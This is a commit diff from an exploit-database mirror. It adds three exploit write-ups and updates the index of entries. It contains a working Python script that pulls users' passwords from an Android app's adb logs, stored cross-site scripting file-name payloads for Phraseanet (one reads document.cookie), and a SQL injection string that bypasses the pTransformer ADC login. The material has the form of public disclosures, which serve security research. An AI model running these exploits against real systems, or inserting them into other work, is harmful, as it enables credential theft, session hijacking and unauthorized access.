DB: 2019-05-29
3 changes to exploits/shellcodes Microsoft Windows - 'Win32k' Local Privilege Escalation EquityPandit 1.0 - Password Disclosure Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass Phraseanet < 4.0.7 - Cross-Site Scripting
This commit is contained in:
parent
18a676ca3b
commit
1a6935f64a
4 changed files with 96 additions and 1 deletions
48
exploits/android/local/46933.txt
Normal file
48
exploits/android/local/46933.txt
Normal file
|
@ -0,0 +1,48 @@
|
||||||
|
#Exploit title: EquityPandit v1.0 - Insecure Logging
|
||||||
|
#Date:27/05/2019
|
||||||
|
#Exploit Author: ManhNho
|
||||||
|
#Software name: "EquityPandit"
|
||||||
|
#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
|
||||||
|
#Version: 1.0
|
||||||
|
# Category: Android apps
|
||||||
|
#Description:
|
||||||
|
|
||||||
|
- Sometimes developers keeps sensitive data logged into the developer
|
||||||
|
console. Thus, attacker easy to capture sensitive information like password.
|
||||||
|
- In this application, with adb, attacker can capture password of any
|
||||||
|
users via forgot password function.
|
||||||
|
|
||||||
|
#Requirement:
|
||||||
|
|
||||||
|
- Santoku virtual machine
|
||||||
|
- Android virtual machine (installed "EquityPandit" apk file)
|
||||||
|
- Victim user/password: victim@abc.com/123456
|
||||||
|
- Exploit code named capture.py in Santoku vm as below:
|
||||||
|
|
||||||
|
import subprocess
|
||||||
|
import re
|
||||||
|
|
||||||
|
process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
|
||||||
|
stdout=subprocess.PIPE)
|
||||||
|
dumps = process_handler.stdout.read()
|
||||||
|
password_list = re.findall(r'password\s(.*)', dumps)
|
||||||
|
print 'Captured %i passwords! \nThey are:' %len(password_list)
|
||||||
|
for index, item in enumerate(password_list):
|
||||||
|
print '\t#%i: %s' %(int(index)+1, item)
|
||||||
|
|
||||||
|
#Reproduce:
|
||||||
|
|
||||||
|
- Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)
|
||||||
|
|
||||||
|
adb connect x.x.x.x
|
||||||
|
|
||||||
|
|
||||||
|
- Step 2: From Android machine, open EquityPandit, click forgot password
|
||||||
|
function for acccount "victim@abc.com" and then click submit
|
||||||
|
- Step 3: From Santoku, execute capture.py
|
||||||
|
- Actual: Password of "victim@abc.com" will be show in terminal as
|
||||||
|
"123456"
|
||||||
|
|
||||||
|
#Demo:
|
||||||
|
|
||||||
|
https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv
|
20
exploits/multiple/webapps/46935.txt
Normal file
20
exploits/multiple/webapps/46935.txt
Normal file
|
@ -0,0 +1,20 @@
|
||||||
|
# Exploit title: Stored XSS vulnerability in Phraseanet DAM Open Source software
|
||||||
|
# Date: 10/10/2018
|
||||||
|
# Exploit Author: Krzysztof Szulski
|
||||||
|
# Vendor Homepage: https://www.phraseanet.com
|
||||||
|
# Software Link (also VM): https://www.phraseanet.com/en/download/ # Version affected: 4.0.3 (4.0.4-dev) and below
|
||||||
|
# Version fixed: 4.0.7
|
||||||
|
# Proof of concept.
|
||||||
|
|
||||||
|
Phraseanet is an Open Source Digital Asset Management software distributed under GNU GPLV3 license.
|
||||||
|
Registered user (or even guest user, depends of configuration) can upload pictures, videos, pdfs or any other document.
|
||||||
|
A crafted file name for uploaded document leads to stored XSS. In simplest form the name of the file would be:
|
||||||
|
"><svg onload=alert(1)>.jpg
|
||||||
|
or:
|
||||||
|
"><svg onload=alert(document.cookie)>.jpg
|
||||||
|
Please notice that the file name should start from double quotation mark.
|
||||||
|
Once a picture will be uploaded it will pop up an alert window and keep popping up every time anybody will login to the website.
|
||||||
|
Another example of more malicious usage would be this file name:
|
||||||
|
"><svg onload=window.history.back()>.jpg
|
||||||
|
From now on every attempt to login will end up with redirection one step back - to login page.
|
||||||
|
Please be aware that this will not affect Chrome browser and other browsers built on chrome engine which has XSS filter built in.
|
24
exploits/windows/remote/46934.txt
Normal file
24
exploits/windows/remote/46934.txt
Normal file
|
@ -0,0 +1,24 @@
|
||||||
|
# Exploit Title: Petraware pTransformer ADC before 2.1.7.22827 allows SQL
|
||||||
|
Injection via the User ID parameter to the login form.
|
||||||
|
# Date: 28-05-2019
|
||||||
|
# Exploit Author: Faudhzan Rahman
|
||||||
|
# Website: https://faudhzanrahman.blogspot.com/
|
||||||
|
# Vendor Homepage: http://www.petraware.com
|
||||||
|
# Version: 2.0
|
||||||
|
# CVE : CVE-2019-12372
|
||||||
|
# Tested on: Windows 10 Pro
|
||||||
|
|
||||||
|
*Description*
|
||||||
|
|
||||||
|
The login form on pTransformer ADC does not filter dangerous character such
|
||||||
|
as single quote ('). This has cause the application to be vulnerable to SQL
|
||||||
|
Injection.
|
||||||
|
|
||||||
|
*Proof-of-concept*
|
||||||
|
|
||||||
|
The vulnerable parameter is User ID. By injecting ' or '1'='1'-- ,it will
|
||||||
|
bypass the login form.
|
||||||
|
|
||||||
|
*Reference*
|
||||||
|
|
||||||
|
https://faudhzanrahman.blogspot.com/2019/05/sql-injection-on-login-form.html
|
|
@ -10527,8 +10527,9 @@ id,file,description,date,author,type,platform,port
|
||||||
46914,exploits/macos/local/46914.rb,"Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)",2019-05-23,Metasploit,local,macos,
|
46914,exploits/macos/local/46914.rb,"Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)",2019-05-23,Metasploit,local,macos,
|
||||||
46918,exploits/windows/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
|
46918,exploits/windows/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
|
||||||
46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows,
|
46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows,
|
||||||
46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,ExpLife0011,local,windows,
|
46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,Arch-Vile,local,windows,
|
||||||
46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow",2019-05-24,"Uday Mittal",local,windows,
|
46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow",2019-05-24,"Uday Mittal",local,windows,
|
||||||
|
46933,exploits/android/local/46933.txt,"EquityPandit 1.0 - Password Disclosure",2019-05-28,ManhNho,local,android,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -17467,6 +17468,7 @@ id,file,description,date,author,type,platform,port
|
||||||
46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
|
46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
|
||||||
46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
|
46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
|
||||||
46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
|
46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
|
||||||
|
46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows,
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -41352,3 +41354,4 @@ id,file,description,date,author,type,platform,port
|
||||||
46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php,
|
46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php,
|
||||||
46921,exploits/php/webapps/46921.sh,"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC",2019-05-24,"Todor Donev",webapps,php,
|
46921,exploits/php/webapps/46921.sh,"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC",2019-05-24,"Todor Donev",webapps,php,
|
||||||
46931,exploits/multiple/webapps/46931.txt,"Deltek Maconomy 2.2.5 - Local File Inclusion",2019-05-27,JameelNabbo,webapps,multiple,
|
46931,exploits/multiple/webapps/46931.txt,"Deltek Maconomy 2.2.5 - Local File Inclusion",2019-05-27,JameelNabbo,webapps,multiple,
|
||||||
|
46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue